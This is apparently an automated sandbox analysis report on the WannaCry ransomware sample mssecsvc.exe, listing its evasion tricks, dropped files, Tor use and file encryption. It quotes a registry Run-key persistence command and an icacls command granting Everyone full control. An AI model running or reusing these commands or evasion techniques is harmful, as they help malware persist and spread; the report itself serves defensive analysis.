Source: mssecsvc.exe | Binary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamewship6.dll.muij% vs mssecsvc.exe
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamediskpart.exej% vs mssecsvc.exe
Source: mssecsvc.exe | Binary or memory string: OriginalFilenamelhdfrgui.exej% vs mssecsvc.exe
Uses reg.exe to modify the Windows registry
Source: unknown | Process created: C:\Windows\System32\reg.exe reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v 'ywepvofkuzu108' /t REG_SZ /d '\'C:\ProgramData\ywepvofkuzu108\tasksche.exe\'' /f
PE file contains more sections than normal
Source: libevent_core-2-0-5.dll.3408.dr | Static PE information: Number of sections : 17 > 10
Source: libeay32.dll.3408.dr | Static PE information: Number of sections : 18 > 10
Source: libevent-2-0-5.dll.3408.dr | Static PE information: Number of sections : 17 > 10
Potential malicious VBS script found (suspicious strings)
Source: C:\Windows\System32\cmd.exe | Dropped file: SET ow = WScript.CreateObject("WScript.Shell")

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to create a new security descriptor
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,5_2_10001360

Anti Debugging:

Contains functionality to register its own exception handler
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_001C11FD SetUnhandledExceptionFilter,_acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,19_2_001C11FD
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\mssecsvc.exe | System information queried: KernelDebuggerInformation
Contains functionality to dynamically determine API calls
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,5_2_100011D0
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\tasksche.exe | Code function: 3_2_004029CC free,GetProcessHeap,HeapFree,3_2_004029CC

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_10002300
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,5_2_10004A40
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exe | Code function: 10_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,10_2_00401080
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,14_2_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,DeleteFileW,swprintf,DeleteFileW,#825,#825,14_2_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,14_2_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_004080C0 __p___argv,FindFirstFileA,fopen,fread,sscanf,fopen,fread,fclose,FindNextFileA,FindClose,sprintf,#537,#537,18_1_004080C0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_004026B0 swprintf,FindFirstFileW,#825,#825,wcscmp,wcslen,wcscmp,wcscmp,swprintf,GetFileAttributesW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,wcscmp,wcscmp,wcscmp,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,swprintf,swprintf,swprintf,#825,#825,18_1_004026B0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_00403CB0 FindFirstFileA,SendMessageA,SendMessageA,sscanf,fopen,fread,sprintf,SendMessageA,#823,SendMessageA,fclose,FindNextFileA,FindClose,18_1_00403CB0
Source: C:\ProgramData\ywepvofkuzu108\taskdl.exe | Code function: 23_1_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,23_1_00401080
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: taskhsvc.exe | Binary or memory string: 9bdnPNObPosMJgjNTFNQ7GrneqcJovXdxnKaDfQMDU2QMnaVIpZWJmCVmciOUzku
Source: taskhsvc.exe | Binary or memory string: ntor-onion-key 98xF42/leL0gt7INkbMlQemUc3uYYiQzK1dmPR0afWA=
Source: taskhsvc.exe | Binary or memory string: r385m+l2iI6U+RBB9ZGf2qEmUhX1m22Ub04mANu8v5MhjaK9Cr/9AgMBAAE=
Source: taskhsvc.exe | Binary or memory string: id ed25519 vA9zbcE+2YhiQRkUAt5LvMCijbpUW4Op15qrMlKqy+s
Source: taskhsvc.exe | Binary or memory string: ntor-onion-key cs1j8xs837ZvQVZiX90H7gHk20kQeMUz/RYOKuTJRHs=
Queries a list of all running processes
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Process information queried: ProcessInformation
Checks the free space of harddrives
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File Volume queried: C:\ FullSizeInformation
Contains long sleeps (>= 3 min)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Thread delayed: delay time: -1000
Enumerates the file system
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\11.0\~SD874C.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\~SD874B.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\~SD8739.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\Security\~SD874E.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\Acrobat\11.0\Replicate\~SD874D.tmp
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File opened: C:\Users\All Users\Adobe\~SD874A.tmp
Found dropped PE file which has not been started or loaded
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Dropped PE file which has not been started: C:\Users\Default\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Dropped PE file which has not been started: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_core-2-0-5.dll
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Dropped PE file which has not been started: C:\Users\Public\Desktop\@WanaDecryptor@.exe
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Dropped PE file which has not been started: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\libevent_extra-2-0-5.dll
Found large amount of non-executed APIs
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | API coverage: 7.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\mssecsvc.exe TID: 3092 | Thread sleep time: -60000s >= -60s
Source: C:\mssecsvc.exe TID: 3200 | Thread sleep time: -60000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244 | Thread sleep time: -500s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3300 | Thread sleep count: 158 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3300 | Thread sleep time: -158000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312 | Thread sleep count: 31 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312 | Thread sleep time: -93000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3304 | Thread sleep time: -95000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244 | Thread sleep count: 77 > 30
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244 | Thread sleep time: -770s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3328 | Thread sleep time: -180000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3244 | Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3312 | Thread sleep time: -3000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3304 | Thread sleep time: -5000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3328 | Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe TID: 3316 | Thread sleep time: -30000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe TID: 3460 | Thread sleep time: -10000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe TID: 3520 | Thread sleep time: -200s >= -60s
Source: C:\Windows\System32\vssadmin.exe TID: 3684 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbem\WMIC.exe TID: 3796 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbadmin.exe TID: 3868 | Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\wbengine.exe TID: 3916 | Thread sleep time: -60000s >= -60s
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe TID: 3912 | Thread sleep time: -200s >= -60s
Source: C:\Windows\System32\vdsldr.exe TID: 3932 | Thread sleep time: -1000s >= -60s
Source: C:\Windows\System32\vdsldr.exe TID: 3968 | Thread sleep time: -60000s >= -60s
Found evasive API chain (may stop execution after checking mutex)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_5-1483

Hooking and other Techniques for Hiding and Protection:

Disables application error messages (SetErrorMode)
Source: C:\mssecsvc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Process information set: NOOPENFILEERRORBOX
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,14_2_004067F0
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 18_1_004067F0 IsIconic,#470,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,#755,#2379,18_1_004067F0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\ProgramData\ywepvofkuzu108\taskse.exe | Code function: 21_2_00401000 Sleep,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,LoadLibraryA,GetProcAddress,AdjustTokenPrivileges,_local_unwind2,CreateProcessAsUserA,WaitForSingleObject,_local_unwind2,21_2_00401000
Creates files inside the volume driver (system volume information)
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File created: C:\System Volume Information\~SD8733.tmp
May use the Tor software to hide its network traffic
Source: taskhsvc.exe | Binary or memory string: onion-port
Uses cacls to modify the permissions of files
Source: unknown | Process created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q

Lowering of HIPS / PFW / Operating System Security Settings:

Overwrites Mozilla Firefox settings
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\revocations.txt.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert8.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\key3.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\secmod.db.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\sessionstore-backups\previous.js.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cert_override.txt.WNCRYT
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | File written: C:\Users\luketaylor\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\SiteSecurityServiceState.txt.WNCRYT

Language, Device and Operating System Detection:

Contains functionality to query local / system time
Source: C:\ProgramData\ywepvofkuzu108\TaskData\Tor\taskhsvc.exe | Code function: 19_2_0032FC04 GetSystemTimeAsFileTime,exit,__stack_chk_fail,19_2_0032FC04
Contains functionality to query the account / user name
Source: C:\ProgramData\ywepvofkuzu108\tasksche.exe | Code function: 5_2_10004F20 swprintf,swprintf,MultiByteToWideChar,CopyFileW,CopyFileW,GetUserNameW,_wcsicmp,SystemParametersInfoW,swprintf,CopyFileW,5_2_10004F20
Contains functionality to query time zone information
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: 14_2_00406F80 SendMessageA,CreateSolidBrush,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateSolidBrush,#1641,CreateFontA,CreateFontA,#1641,CreateFontA,#1641,CreateFontA,#1641,#3092,SendMessageA,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#3092,SendMessageA,#860,#537,#537,#540,#2818,#535,#2818,#535,SendMessageA,SendMessageA,#6140,#6140,GetTimeZoneInformation,SystemTimeToTzSpecificLocalTime,SystemTimeToTzSpecificLocalTime,#2818,SystemTimeToTzSpecificLocalTime,#2818,#6334,#800,14_2_00406F80
Queries the cryptographic machine GUID
Source: C:\mssecsvc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query locale information (e.g. system language)
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,14_2_00406C20
Source: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe | Code function: SendMessageA,GetUserDefaultLangID,GetLocaleInfoA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,18_1_00406C20
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cscript.exe | Queries volume information: C:\ProgramData\ywepvofkuzu108\@WanaDecryptor@.exe VolumeInformation

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 269081 | Sample: mssecsvc.exe | Startdate: 12/05/2017 | Architecture: WINDOWS | Score: 100
[Rendered behavior graph not reproducible as text: nodes for the started processes (mssecsvc.exe, tasksche.exe, cmd.exe, cscript.exe, @WanaDecryptor@.exe, taskhsvc.exe, taskse.exe, reg.exe, vssadmin.exe, WMIC.exe, bcdedit.exe), the dropped files (tasksche.exe, taskdl.exe, taskse.exe, libeay32.dll, libevent-2-0-5.dll, libevent_core-2-0-5.dll), the contacted hosts and the triggered signatures; several nodes are collapsed because they exceeded the per-level capacity.]

Yara Overview

No Yara matches

Screenshot